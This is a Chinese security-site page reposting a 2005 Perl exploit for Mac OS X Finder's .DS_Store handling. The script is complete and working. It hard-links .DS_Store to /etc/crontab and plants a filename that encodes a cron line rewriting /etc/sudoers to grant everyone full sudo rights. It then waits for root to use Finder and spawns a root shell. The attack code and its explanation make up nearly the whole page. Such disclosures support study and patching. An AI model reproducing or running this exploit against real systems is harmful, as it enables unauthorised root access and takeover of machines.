首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X 'Finder/DS_Store' Arbitrary File Overwriting Exploit
来源:www.fakehalo.us 作者:vade79 发布时间:2005-02-08  

Mac OS X "Finder/DS_Store" Arbitrary File Overwriting Exploit

#!/usr/bin/perl
#
# [OSX Finder] DS_Store arbitrary file overwrite exploit. (root version)
#
# vade79 -> v9@fakehalo.us (fakehalo/realhalo)
#
# this will create a directory called "xfinder" in your home directory,
# once the root user has modified that directory using Finder in almost any
# way(such as copying a file out of it, etc) it will write to the .DS_Store
# file in that directory. the data written to the .DS_Store file will
# consist of the filenames/subdirectories making up the directory and the
# attributes of the directory.
#
# this exploit works by linking the .DS_Store file to /etc/crontab, and
# creating a special unicode(utf8 encoded) file in the directory. the file
# created in unicode is equal to(in ASCII):
# '\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n'
#
# this file will display as a japanese-like series of characters and
# is (part of) what is written to the .DS_Store file, which allows for
# the privilege escalation. once this line has been written to
# /etc/crontab(along with other .DS_Store data), crontab will overwrite
# /etc/sudoers with "ALL ALL=(ALL) ALL" and you can then sudo to root.
#
# note: this is done through crontab->sudo because sudo will complain
# of the .DS_Store garbage data in the /etc/sudoers file and exit,
# whereas crontab will ignore it.
#
# (sorry for the squished/ugly script, just a precaution for
# wordwrapping)

use encoding utf8;
sub pexit{print("[!] @_.\n");exit(1);}
$testdir="$ENV{HOME}/xfinder";
print("[OSX Finder] DS_Store arbitrary file overwrite exploit.\n\n");
if(!-f"/etc/crontab"||!-f"/etc/sudoers"){
pexit("/etc/crontab and /etc/sudoers are required for this to work");
}
mkdir($testdir)||pexit("Could make the directory \"$testdir\", " .
"make sure it doesn't already exist");
chdir($testdir)||pexit("Could change the directory to \"$testdir\"");
# = "\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n"
open(TOUCH,">" . Encode::encode_utf8(
"\x{0a0a}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{726f}\x{6f74}" .
"\x{2065}\x{6368}\x{6f20}\x{2241}\x{4c4c}\x{2041}\x{4c4c}\x{3d28}" .
"\x{414c}\x{4c29}\x{2041}\x{4c4c}\x{223e}\x{2f65}\x{7463}\x{2f73}" .
"\x{7564}\x{6f65}\x{7273}\x{0a0a}"))||pexit("Could not create " .
"unicode/utf8 encoded filename");
close(TOUCH);
link("/etc/crontab",".DS_Store")||pexit("Could not link .DS_Store " .
"to /etc/crontab");
print("[+] Waiting for root user to modify \"$testdir\" with " .
"Finder...\n");
print("[?] (CTRL-C if desired, this script does not need to be " .
"running to work)\n");
@ast=@st=stat("/etc/crontab");
while($st[7]==$ast[7]&&$st[9]==$ast[9]){
sleep(1);
@ast=stat("/etc/crontab");
}
print("[+] /etc/crontab has been modified.\n");
print("[+] Waiting for crontab to change /etc/sudoers...\n");
@ast=@st=stat("/etc/sudoers");
while($st[7]==$ast[7]&&$st[9]==$ast[9]){
sleep(1);
@ast=stat("/etc/sudoers");
}
print("[+] /etc/sudoers has been modified.\n");
print("[+] Attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");
exit(0);



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Setuid perl 'PerlIO_Debug()' L
·3CServer v1.1 FTP Server Remot
·Setuid perl 'PerlIO_Debug()' A
·AppleFileServer (AFS) 'FPLogin
·ngIRCd 'Log_Resolver()' Remote
·SLX server 6.1 Proof of concep
·Newspost 'socket_getline()' Re
·Microsoft Windows Metafile (.e
·Linux ncpfs Local Exploit
·Microsoft IIS WebDAV XML Denia
·Xpand Rally <= 1.0.0.0 serv
·Ability Server <= 2.34 Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved